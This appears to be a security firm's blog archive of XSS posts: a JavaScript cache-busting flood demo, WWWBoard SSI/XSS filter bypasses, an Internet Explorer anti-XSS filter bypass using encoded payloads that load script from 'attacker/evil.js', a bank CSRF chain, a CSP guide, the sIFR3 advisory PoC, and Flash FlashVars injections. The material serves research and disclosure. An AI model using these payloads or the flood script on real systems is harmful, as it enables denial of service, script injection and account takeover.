Tag Archives: XSS

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into this problem before: people don’t seem to understand how this works, or even that it’s possible, despite multiple attempts at explaining it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find, though, is that heavy database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, for example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests, using different parameter-value pairs each time to bypass caching servers like Varnish. An adversary would never want to run this kind of code directly, because the flood would come from their own IP address. Instead, it’s much more likely to be used by an adversary who tricks a large swath of people into executing it. And as Matt points out in the video, it’s probably going to end up in XSS payloads at some point.
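To make the concept concrete, here is a minimal sketch of the idea (this is not the actual FlashFlood script; the target URL and request count are placeholders): give every request a unique query string, so a URL-keyed cache such as Varnish treats each one as a miss and passes it through to the application and its database.

// Minimal illustration of cache-busting request flooding.
// Assumption: target and count are placeholders for demonstration only.
var target = 'http://example.com/';
function flood(count) {
  for (var i = 0; i < count; i++) {
    // A unique parameter/value pair per request defeats URL-keyed caches,
    // forcing every hit back to the origin server and its database.
    var cacheBuster = 'q=' + Math.random().toString(36).slice(2) +
                      '&t=' + new Date().getTime();
    var img = new Image();
    img.src = target + '?' + cacheBuster;
  }
}
flood(100); // each of these is a cache miss

Using Image() to fire the requests keeps the sketch free of same-origin restrictions, which is also why this sort of thing drops so neatly into an XSS payload.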

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some modern-day knowledge about web application security against 20-year-old tech? So I took a look at WWWBoard. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, a number of vulns have been found in it over the years – four CVEs in all. But I decided to look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it actually has some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past a Perl regex if you allow nulls. But that second substitution makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit so you had to break it up into two chunks that would be executed together once the page was re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->
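To see why the filter misses this, here is a rough JavaScript equivalent of the Perl substitution above, applied to each posted field on its own (which is what the per-$value substitution amounts to):

// Rough JS equivalent of the Perl filter above, run per form field.
var stripSSI = function (s) { return s.replace(/<!--[\s\S]*-->/g, ''); };

var subject = '<!--#exec cmd="ls -al" echo=\'';
var body    = '\' -->';

console.log(stripSSI(subject)); // unchanged: no closing "-->" in this field
console.log(stripSSI(body));    // unchanged: no opening "<!--" in this field
// Once the board stitches subject and body back into one HTML page, the
// full <!--#exec --> directive is reassembled for the server to execute.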

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention that Matt’s project is on its deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI, I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browsers more reliably than SSI does on websites.

As I kept looking, I found all kinds of other issues that would lead to the board getting spammed like crazy. In practice, when I went hunting for the board on the Internet, all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in long-forgotten but still functional places all over the web. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s fascinating to see how bad things really were, and how little security there was, when the web was in its infancy.

#HackerKast 8: Recap of JPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake for being cold in Texas, we started off this week’s HackerKast with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not one of their main websites but a one-off, brochureware-type site built to promote and organize a company-sponsored running race.

This shift in attacker focus is something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, are either hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs On Security, who pointed out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points, and cashing out. One major weakness pointed out here is that most of these services use a four-digit PIN to get into your rewards account, which leaves only 10,000 possible combinations to brute force. Robert makes a great point that even if they move from four-digit PINs to a password system, that only makes brute forcing more difficult: if the bad guys find value here, they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new TOR onion version of Facebook that has been set up to allow anonymous use of Facebook. There is the obvious use case of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out without worrying about prosecution or their personal safety.

I brought up an interesting bug bounty write-up shared around the blogosphere this week by a researcher named von Patrik, who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug, but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface, but it allowed you to upload a JSON file containing additional configs and inputs for SEO tags. This file was not sanitized, so an XSS payload could be stored via the file upload, making the injection persistent. Pretty juicy stuff!

Finally, we wrapped up with more Google talk: a bypass of Gmail two-factor authentication. Specifically, the attack in question went after the text message implementation of 2FA, not the token-generating app that Google puts out. There are a number of ways this can happen, but the most recent story involves attackers calling up mobile providers and social engineering their way into access to the text messages, getting the second-factor token needed to compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user against the response body from the website, looking for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page but not cause immediate JavaScript code execution, that untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

The filter catches this case as well: when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

the reflection, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further, to the first official HTML standard, HTML 2.0, in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of an HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.
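As a rough illustration of how such a payload can be prepared (a sketch; the helper function and the choice of which characters to encode are mine, not part of the original write-up – anything that keeps the first reflection from looking immediately executable will do):

// Sketch: HTML-entity-encode a few characters of the payload so the first
// reflection (inside the iframe's src attribute) no longer looks executable
// to the filter, then URL-encode the whole thing for the query string.
function partialEncode(payload, chars) {
  return payload.split('').map(function (ch) {
    return chars.indexOf(ch) !== -1
      ? '&#' + ch.charCodeAt(0) + ';'   // decimal character reference
      : ch;
  }).join('');
}

var payload = '<script src=http://attacker/evil.js></script>';
var masked  = partialEncode(payload, ['c', 'r', 'p']);
// masked: <s&#99;&#114;i&#112;t s&#114;&#99;=htt&#112;://atta&#99;ke&#114;/evil.js></s&#99;&#114;i&#112;t>
var url = 'http://vulnerable-iframe/inject?xss=' + encodeURIComponent(masked);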

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword:

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the usage of decimal and hexadecimal encodings is not the flaw, but rather two implementations that make use of the method that exploits the flaw. Often simple URL/URI-encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw in Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data, and trusted data is not subject to validation by the filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Chained Exploits

Sometimes a single exploited vulnerability leads to the newsworthy stories of businesses getting compromised, but usually it is the chaining of two, three, four, or more vulnerabilities together that leads to the compromise.

That’s where WhiteHat comes in. WhiteHat will report not just the XSS, SQL injection, and CSRF, but the Information Leakage, Fingerprinting, and other vulnerabilities. Those vulnerabilities may not be much by themselves, but if I see your dev and QA environments in commented-out HTML source code in your production environment, I just found myself new targets. That QA environment may or may not have the same code that is running on the production environment, but does it have the same configurations? The same firewall settings? Are those log files monitored like the production environment? I now have a leg up into your network, all because of an Information Leakage vulnerability that I was able to leverage and chain together with other vulnerabilities. How about a Fingerprinting vulnerability that tells me you are running an out-of-date version of nginx or PHP or Ruby on Rails – a version I happen to know is vulnerable to Remote Code Execution, Buffer Overflow, Denial of Service, or something else? You just made my job much easier. Doesn’t seem so benign now, does it?

But let’s assume for a moment that you take care of those problems. You turn off stack traces, you get rid of private IP addresses in the response headers. What next? Let’s build another scenario, one that I encountered recently.

There is a financial institution that provides online statements to users for their accounts. To encourage users to use the online statements instead of paper statements, it charges a nominal fee to get paper versions of their imaged checks. As part of the login process, in addition to the username and password, a user needs to answer one or more security questions before gaining access to the account. This helps prove that it is the real user and not someone who was able to obtain or guess the username and password.

Have that vision in your head? Now, what if I told you that I could CSRF transferring funds, but only between the accounts you have, perhaps a checking account and a credit card account? That surely can’t be bad, can it? Well, it turns out that the user gets charged whenever a cash advance is made from their credit card to their checking account. Okay, so I can rack up some charges. But what if I want to do something else? Say, CSRF changing their username? If you’ll recall, I need the password too, along with the security questions. No go on the password and security questions. But I can CSRF changing the user from online statements to paper statements and, for added fun, make them get charged for the imaged checks. My fun doesn’t stop there. The crème de la crème. The pièce de résistance. The go big or go home. CSRF on the mailing address.

Why is that such a big deal, you ask? Now I know the username of the account. I have active account statements sent to a mailing address I control, along with imaged checks. And then, all I need to do is call the bank’s customer support, ask about “my” account, using “my” username, “my” account number, and the details of the imaged checks just in case the bank asks for further confirmation to prove that I am who I say I am.

And then I say: “Oh, and I’m calling because I forgot both my password and the answer to my security questions.”

Is it common for users to forget their security questions? Yes. I used to be in the habit of providing fake answers to security questions because I didn’t want an attacker who might know or guess what would otherwise be a correct answer to get into my account. But me being me, I forgot them and lost access to the account. Others may be in the same habit.

So you gotta ask yourself, what’s one vulnerability?

Content Security Policy

What is it and why should I care?
Content Security Policy (CSP) is a new(ish) technology put together by Mozilla that Web apps can use as an additional layer of protection against Cross-Site Scripting (XSS). This protection against XSS is the primary goal of CSP technology. A secondary goal is to protect against clickjacking.

XSS is a complex issue, as is evident from the recommendations in the OWASP prevention “cheat sheets” for XSS in general and DOM-based XSS. Overall, CSP does several things to help app developers deal with XSS.

Whitelist Content Locations
One reason XSS is quite harmful is that browsers implicitly trust the content received from the server, even if that content has been manipulated and is loading from an unintended location. This is where CSP provides protection from XSS: it allows app developers to declare a whitelist of trusted locations for content. Browsers that understand CSP will then respect that list, load content only from those locations, and ignore content that references locations outside the list.

No Inline Scripts
XSS is able to add scripts inline to content because browsers have no way of knowing whether the site actually sent that content or whether an attacker added the script to it. CSP prevents this entirely by forcing the separation of content and code (great design!). However, this means that you must move all of your scripts to external files, which will require work for most apps, although it can be done. The upside is that for an attack to succeed against a site using CSP, an attacker must be able to:
Step 1.  Inject a script tag at the head of your page
Step 2.  Make that script tag load from a trusted site within your whitelist
Step 3.  Control the referenced script at that trusted site

Thus, CSP makes an XSS attack significantly more difficult.

Note: One question that consistently comes up is: what about event handling? Yes, CSP still allows event handling, but handlers need to be attached from script (via the onXXX handler properties or the addEventListener mechanism) rather than through inline HTML attributes.
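For example, an onclick attribute that CSP would block can be replaced with a handler registered from one of your whitelisted external script files (the element id and saveForm() function here are made up for illustration):

// In HTML: <button id="save-btn">Save</button>   (no onclick attribute)
// In an external, whitelisted script file:
document.addEventListener('DOMContentLoaded', function () {
  var btn = document.getElementById('save-btn');
  btn.addEventListener('click', function () {
    saveForm(); // same logic that used to live in onclick="saveForm()"
  });
});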

No Code from Strings (eval dies)
Another welcome addition to CSP is the blacklisting of functions that create code from strings. This means that usage of the evil eval is eliminated (along with other string-evaluation mechanisms such as the Function constructor and string arguments to setTimeout/setInterval). Creating code from strings is a popular attack technique, and is rather difficult to trace, so the removal of all such functions is actually quite helpful.

Another common question stemming from the use of CSP is how to deal with JSON parsing. From a security perspective, the right way has always been to actually parse the JSON (for example with JSON.parse) instead of doing an eval anyway; because that functionality is still available under CSP, nothing needs to change in this regard.
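A minimal before/after sketch of that point:

// Dangerous pattern that CSP's no-eval rule forbids:
//   var data = eval('(' + jsonText + ')');
// Safe equivalent that keeps working under CSP:
var jsonText = '{"user":"alice","admin":false}';
var data = JSON.parse(jsonText);
console.log(data.user); // "alice"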

Policy Violation Reporting
A rather cool feature of CSP is that you can configure your site with a violation reporting handler, which makes that data available whether you run in report-only mode or enforcing mode. In report-only mode, you can get reports of locations in your site where execution will be prevented once you enable CSP (a nice way to test). In enforcing mode you still get this data, so in production you can also use this mechanism as a simple XSS detection tool (“bad guy tried XSS and it didn’t run”).
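Browsers POST violation reports as JSON wrapped in a top-level “csp-report” object to the URL named in report-uri. Here is a minimal sketch of a collector (the endpoint path matches the report-uri example further down; the port and logging are illustrative, not a specific implementation):

// Minimal Node.js sketch of a CSP violation report collector (illustrative).
var http = require('http');

http.createServer(function (req, res) {
  if (req.method === 'POST' && req.url === '/post-csp-report') {
    var body = '';
    req.on('data', function (chunk) { body += chunk; });
    req.on('end', function () {
      try {
        var report = JSON.parse(body)['csp-report'];
        // Enough detail to spot both misconfigurations and attempted XSS.
        console.log('CSP violation on', report['document-uri'],
                    '-', report['violated-directive'],
                    'blocked:', report['blocked-uri']);
      } catch (e) {
        console.log('Unparseable CSP report');
      }
      res.writeHead(204);
      res.end();
    });
  } else {
    res.writeHead(404);
    res.end();
  }
}).listen(8080);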

What should I do about the availability of CSP?

Well, you should use it! Actually, CSP seems to have no real downside: it’s there to make your site safer, and even if a client’s browser does not support it, it is entirely backwards-compatible, so your site will not break for the client.

In general, I think the basic approach with CSP should be:

Step 1.  Solve XSS through your standard security development practices (you should already be doing this)
Step 2.  Learn about CSP – read the specs thoroughly
Step 3.  Make the changes to your site; then test and re-test (normal dev process)
Step 4.  Run in report-only mode and monitor any violations in order to find areas you still need to fix (this step can be skipped if you have a fully functional test suite that you can execute against your app in testing – good for you, if you do!)
Step 5. After you’re confident that your site is working properly, turn it on to the enforcing mode

As for how you actually implement CSP, you have two basic options: (1) an HTTP header, and (2) a META tag. The header option is preferred, and an example is listed below:

Content-Security-Policy: default-src 'self';

img-src *;

object-src media1.example.com media2.example.com *.cdn.example.com;

script-src trustedscripts.example.com;

report-uri http://example.com/post-csp-report

The example above says the following:

Line 1: By default, only allow content from 'self', i.e. the site represented by the current URL
Line 2: Allow images from anywhere
Line 3: Allow objects only from the listed URLs
Line 4: Allow scripts only from the listed URL
Line 5: Use the listed URL to report any violations of the specified policy
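For step 4 of the rollout above, the same policy can be delivered in report-only mode simply by changing the header name; the directives stay exactly the same, and violations are reported to the report-uri without anything being blocked:

Content-Security-Policy-Report-Only: default-src 'self'; report-uri http://example.com/post-csp-report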

In summary, CSP is a very interesting and useful new technology to help battle XSS. It’s definitely a useful tool to add to your arsenal.

References
________________________________________________________
https://developer.mozilla.org/en/Introducing_Content_Security_Policy
https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html
https://wiki.mozilla.org/Security/CSP/Design_Considerations
https://wiki.mozilla.org/Security/CSP/Specification
https://dvcs.w3.org/hg/content-security-policy/raw-file/bcf1c45f312f/csp-unofficial-draft-20110303.html
http://www.w3.org/TR/CSP/
http://blog.mozilla.com/security/2009/06/19/shutting-down-xss-with-content-security-policy/
https://mikewest.org/2011/10/content-security-policy-a-primer
http://codesecure.blogspot.com/2012/01/content-security-policy-csp.html
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html

sIFR3 Cross Site Scripting


WhiteHat Security Vulnerability Advisory

Affected Product:   Scalable Inman Flash Replacement (sIFR) version 3

Vulnerability:   Cross Site Scripting

CVE ID:   CVE-2011-3641

Affected Versions:   sIFR3 r436 and prior

Vendor Homepage:   http://wiki.novemberborn.net/sifr3/

Description:   sIFR3 allows for the use of non-free fonts within a web application via the Adobe Flash plugin. The sIFR3 module interfaces with an external JS file and uses the parameter “version” to ensure the two files are compatible. The textField that is displayed upon invalid input in the “version” parameter supports limited HTML rendering, which allows for Cross Site Scripting. An attacker can render arbitrary images that execute malicious javascript and, in Adobe Flash Player 10.3 and prior, include a long run of break tags to push the encapsulating error message out of view.

Proof of Concept:

/cochin.swf?version=<a href="javascript:confirm(document.cookie)"><img src="Attacker_Image.jpg"/></a><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>

Fix:  

Recompile any affected modules with the latest release (r437) which can be obtained from the vendor’s website: http://dev.novemberborn.net/sifr3/nightlies/sifr3-r437-CVE-2011-3641.zip

Editor’s note: Portions of this blog, including the headline, were edited by the author on December 9 after a CVE was assigned and the correct name had been given to the vuln.

The Anywhere Internet and the Nowhere Security

It used to be that if you wanted to do something on the computer, you’d boot up your PC or Mac and open a piece of installed software to go about your business.

Those were the simple times.

Now though, with the explosion of Internet-connected smartphones and software-as-a-service, the hardware-based operating system and all the protections that come with it have gone out the door. Firewalls, antivirus software, and heavily secured system coding have all been rendered useless as applications delivered through the Web to your mobile device or computer have become the new operating systems. In the past six months, we have seen literally hundreds of breaches affecting hundreds of millions of consumers. From your local bank to three-letter government agencies, all have had Web-facing presences that were epically breached.

This shift in computing and in the consumption of software has also shifted perceptions of who handles online security and how. Where before your safety was assumed to come from the operating system and a handful of third-party AV solutions, now it is up to the expert coding of those writing the applications we dutifully use. As these applications have become increasingly powerful and linked to all of our devices, our personal data has moved to the Internet with them, meaning, theoretically, that anyone with Internet access could potentially steal that information.

The mobile paradigm brings a new problem of insecurity as well, as not only is your data accessible via the Internet on your device, but you can physically lose a cell phone much more easily than a computer. So now your data can be either digitally or physically stolen and it’s up to developers to make sure that any digital information remains safe from being compromised.

The rise of the application as the de facto way to function today means that there is a huge burden placed on the companies who normally just provided operating systems.

Vulnerabilities in a Flash


Flash Player-related vulnerabilities currently account for approximately 14% of all Web application vulnerabilities discovered by WhiteHat Security. This statistic is surprisingly high considering that HTTP Archive reports 47% of Web applications are currently using Flash technology.

Flash Media Player is an effective method for delivering stylish vector graphics across multiple platforms to enrich a Web user’s experience. When properly designed, Flash makes a website visit interactive and fun. Unfortunately, Flash can also introduce vulnerabilities to an otherwise safe application. Many Flash developers are primarily designers who may have some programming experience, but little – if any – knowledge about Web security.

Flash Player itself has many security restrictions and policies, but users often misunderstand them – or even purposely disable them to get a particular feature to “work.” Among many Flash designers, there’s also a common misconception that the Flash framework will provide all the protection their applications need.

One of the most frequent comments I get about Flash vulnerabilities is, “Doesn’t my cross-domain policy file protect me from that problem?” Well, the cross-domain policy file does prevent cross-domain data loading for execution; but it is a unidirectional permission that the server hosting the data file grants. The permission does not come from the Flash file. Some people may find the cross-domain policy file to be “backwards” compared to what they expect, and in many attack scenarios the Flash file will first seek permission from the attacker’s domain before initiating the attack.

Flash Player has an in-depth security sandbox model based on the domain where the Flash file is embedded, and I will discuss the scenarios for when a sandbox policy applies and how that policy can be bridged or bypassed – but in a later blog post. In this post I’m going to focus on the simplest and most prevalent method used today on the Web to exploit Flash files – unsanitized FlashVars.

FlashVars

Flash Player supports several methods to declare variables that are to be used in the resulting content. The two most common techniques are: (1) declaring FlashVars in a related javascript block, or (2) using the param tag within an object/embed. A third, and sometimes overlooked, method to declare variables is by directly referencing them in a URL query string. Many Flash designers build their projects primarily for flexibility in order to allow greater customization and wider distribution, but these “features” often allow attackers to make their own customizations – and then exploit the application.

Typical banner ad with FlashVars to specify remote image and link:

<object>
<param name="movie" value="swf/banner.swf" />
<param name="img" value="image1.jpg" />
<param name="link" value="http://www.whitehatsec.com" />
<embed src="swf/banner.swf" flashvars="img=image1.jpg&amp;link=http://www.whitehatsec.com" />
</object>

Attacker’s link to the SWF:

http://www.example.com/swf/banner.swf?img=http://web.appsec.ws/images/WH.jpg&link=javascript:confirm('Session%20Information%20Sent%20to%20Hacker');//


FlashVars with HTML Support

If a Flash file is compiled with HTML support for a given textbox, then an attacker can inject a limited subset of HTML to achieve code execution. The Flash framework supports two main HTML tags that are of interest to an attacker: ANCHOR and IMAGE. A simple SWF file that reflects user input can be used to execute malicious javascript when a user clicks on the file.

Attacker’s NameTag link:

http://www.example.com/swf/nameTag.swf?name=<a href="javascript:confirm(1)">Haxor</a>


Server Filter Bypass

With the exception of Internet Explorer, Flash Player in all browsers will evaluate a query string placed behind a hash character. Because the browser does not forward the fragment portion of the URL with the request for the Flash file, an attacker can bypass any attempt at server-side filtering.

http://www.example.com/flash/main.swf#?text=WhiteHat+Security,+Inc.


Internet Explorer Sandbox Bypass

When directly rendering a Flash file, Internet Explorer will first construct an encapsulating document in the DOM in which to embed the Flash file. The browser then puts a security restriction in place so that the embedded content has no access to the DOM information of the current domain. As in many Microsoft programs, this was a brilliant concept, but the QA performed was inadequate to ensure that it became an effective security measure. The fact is, if a Flash file containing malicious javascript is reloaded, it will immediately bridge the security control and give an attacker access to the DOM. The victim clicks once, which initiates the reload; then, thinking nothing has happened, clicks a second time – and gets owned.


Redirection

A recent Flash 0-day that allowed an attacker to submit arbitrary HTTP headers to an application was the result of an unhandled 307 redirection from a domain controlled by an attacker. Flash Player has always had limitations handling HTTP responses if it receives anything other than a 200 OK. The problem stems from lack of insight into how a given HTTP request is handled by the Web browser. Firefox 4 contains a new API that hopes to remediate this issue by providing additional insight for browser plugins. If a Flash file utilizes an external configuration file an attacker can bypass any attempt to restrict data loading from a given domain if the domain also contains an open redirection. The Flash file will verify that the initial request is for a trusted domain, but will load the malicious configuration file residing on the attacker’s domain.


Proof of Concept

The following video demonstrates the common issue of Flash files loading external XML configurations via FlashVars without properly validating that the XML file resides on a trusted domain. The popular Camtasia Studio presentation software was used to produce the video, which shows the vulnerabilities present in Camtasia’s own ExpressShow SWF files. The developer of the files, TechSmith, has addressed this issue with a patch that must be manually applied (available via TechSmith Security Bulletin 5). The patch restricts generated Flash files to loading XML configurations that reside on the same domain as the Flash file.

[youtube]http://www.youtube.com/watch?v=cDAefrArPyo[/youtube]


References

HTTP Archive
Guya.net – Flash Bug in Internet Explorer Security Model
OWASP Flash Security Project


Jason Calvert @mystech7
Application Security Engineer
WhiteHat Security, Inc.
